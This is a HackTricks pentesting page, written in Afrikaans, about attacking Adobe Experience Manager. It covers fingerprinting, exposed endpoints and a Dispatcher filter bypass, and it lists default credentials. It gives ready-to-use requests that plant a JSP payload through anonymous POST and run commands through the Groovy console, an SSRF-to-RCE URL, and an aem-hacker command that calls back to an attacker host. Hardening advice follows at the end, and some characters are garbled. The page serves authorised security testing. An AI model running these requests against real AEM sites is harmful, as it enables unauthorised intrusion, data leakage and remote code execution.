AEM (Adobe Experience Manager) Pentesting
Reading time: 5 minutes
tip
Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die š¬ Discord groep of die telegram groep of volg ons op Twitter š¦ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Adobe Experience Manager (AEM, deel van die Adobe Experience Cloud) is 'n ondernemings CMS wat bo-op Apache Sling/Felix (OSGi) en 'n Java Content Repository (JCR) loop. Vanuit 'n aanvaller se perspektief stel AEM-instansies baie dikwels gevaarlike ontwikkelings eindpunte, swak Dispatcher-reƫls, standaard akrediteer en 'n lang stert van CVE's bloot wat elke kwartaal reggestel word.
Die kontrolelys hieronder fokus op extern bereikbare (unauth) aanval oppervlak wat voortdurend in werklike betrokkenhede verskyn (2022-2025).
1. Fingerprinting
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
Ander vinnige aanwysers:
/etc.clientlibs/
statiese pad teenwoordig (gee JS/CSS terug)./libs/granite/core/content/login.html
aanmeldblad met die āAdobe Experience Managerā banier.</script><!--/* CQ */-->
kommentaar aan die onderkant van HTML.
2. Hoƫ-waarde nie-geoutentiseerde eindpunte
Pad | Wat jy kry | Aantekeninge |
---|---|---|
/.json , /.1.json | JCR knope via DefaultGetServlet | Dikwels geblokkeer, maar Dispatcher omseiling (sien hieronder) werk. |
/bin/querybuilder.json?path=/ | QueryBuilder API | Lek van bladboom, interne pades, gebruikersname. |
/system/console/status-* , /system/console/bundles | OSGi/Felix konsole | 403 per standaard; as blootgestel & akrediteer gevind ā bundel-oplaai RCE. |
/crx/packmgr/index.jsp | Pakketbestuurder | Laat geoutentiseerde inhoudspakkette toe ā JSP payload oplaai. |
/etc/groovyconsole/** | AEM Groovy Konsole | As blootgestel ā arbitrĆŖre Groovy / Java uitvoering. |
/libs/cq/AuditlogSearchServlet.json | Oudit logs | Inligtingsontsluiting. |
/libs/cq/ui/content/dumplibs.html | ClientLibs dump | XSS-vak. |
Dispatcher omseiling truuk
Meeste produksie-webwerwe sit agter die Dispatcher (omgekeerde proxy). Sy filterreƫls kan omseil word deur 'n toegelate statiese uitbreiding na 'n puntkomma of geƫnkodeerde nuwe lyn by te voeg:
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
'n Enkele versoek soos hierbo openbaar dikwels gebruikersprofielknope met e-posadresse. P-T Partners het goeie leiding oor hierdie swakheid gepubliseer. ćć
3. Algemene miskonfigurasies (nog steeds lewendig in 2025)
- Anonieme POST servlet ā
POST /.json
met:operation=import
laat jou toe om nuwe JCR knope te plant. Om*.json
POST in die Dispatcher te blokkeer, los dit op. ćć - WĆŖreldleesbare gebruikersprofiele ā standaard ACL verleen
jcr:read
op/home/users/**/profile/*
aan almal. - Standaard akrediteer ā
admin:admin
,author:author
,replication:replication
. - WCMDebugFilter geaktiveer ā weerspieĆ«lde XSS via
?debug=layout
(CVE-2016-7882, steeds gevind op erfenis 6.4 installasies). - Groovy Console blootgestel ā afstandkode-uitvoering deur 'n Groovy-skrip te stuur:
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
4. Onlangse kwesbaarhede (dienspakket kadens)
Kwartaal | CVE | Aangetas | Impak |
---|---|---|---|
Des 2024 | CVE-2024-43711 | 6.5.21 en vroeĆ«r | Onbehoorlike invoervalidasie ā Arbitraire kode-uitvoering (vereis lae-priv akker). ćć |
Des 2024 | CVE-2024-43724/26 | 6.5.21 en vroeĆ«r | DOM / Gestoor XSS in Move Page Wizard. ćć |
Des 2023 | CVE-2023-48452/68 | ⤠6.5.18 | DOM-gebaseerde XSS via vervaardigde URL. ćć |
Des 2022 | CVE-2022-30683 | ⤠6.5.13 | Crypto ontwerpfout ā geheime ontsleuteling (benodig lae-priv akrediteer). ćć |
Kontroleer altyd die APSB bulletin wat ooreenstem met die kliƫnt se dienspakket en vra die nuutste 6.5.22 of Cloud Service 2024.11.
5. Exploitasiestukke
5.1 RCE via dispatcher omseiling + JSP opgelaai
As anonieme skryf moontlik is:
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded
:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
Now request /content/evil.jsp
ā die JSP loop met die AEM proses gebruiker.
5.2 SSRF na RCE (histories < 6.3)
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
aem_ssrf2rce.py
van aem-hacker outomatiseer die volle ketting. ćć
6. Gereedskap
- aem-hacker ā Switserse leĆ«r enumerasie skrip, ondersteun dispatcher omseiling, SSRF opsporing, standaard-kredens kontrole en meer.
python3 aem_hacker.py -u https://target --host attacker-ip
- Inhoud Brute-force ā herhalend versoek
/_jcr_content.(json|html)
om verborge komponente te ontdek. - osgi-infect ā laai kwaadwillige OSGi bundel op via
/system/console/bundles
as kredens beskikbaar is.
7. Versterking kontrolelys (vir jou verslag se aanbevelings)
- Hou die instansie op die nuutste kumulatiewe dienspakket (soos van Jul 2025: 6.5.22).
- Verwyder/roteer standaard rekeninge; afdwing SSO/SAML.
- Versterk Dispatcher filters ā weier
;
, geƫnkodeerde nuwe reƫls, en*.json
of*.querybuilder.json
vir anonieme gebruikers. - Deaktiveer of beskerm consoles (
/system/console
,/crx/*
,/etc/groovyconsole
) met IP toelaat-lists. - Pas die Anonieme Toestemming Versterking pakket toe wat deur Adobe gestuur is.
Verwysings
- Adobe Security Bulletin APSB24-69 ā āVeiligheidsopdaterings vir Adobe Experience Manager (Des 2024)ā.
- 0ang3el ā aem-hacker hulpmiddel (GitHub).
tip
Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die š¬ Discord groep of die telegram groep of volg ons op Twitter š¦ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.